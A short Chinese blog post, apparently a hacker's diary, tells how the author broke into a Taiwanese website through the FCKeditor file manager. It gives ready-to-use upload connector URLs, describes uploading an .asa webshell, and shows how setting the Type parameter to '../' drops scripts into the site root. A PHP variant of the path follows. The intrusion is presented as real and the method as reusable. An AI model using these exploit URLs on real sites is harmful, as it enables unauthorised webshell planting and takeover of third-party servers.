« 上一篇下一篇 »

FCKeditor上传漏洞

晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.
这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用

再入侵的时候,宝发现的心得我记录下:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了,我和宝上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:
http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp

所传的文件就到了 http://www.xxx.tw/UserFiles/cnandbao/下了

经过进一步的考虑,
如果这样输入:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.

所传的文件就到了网站根目录下了


/module/editor/filemanager/browser/default/browser.html?Type=/&Connector=connectors/php/connector.php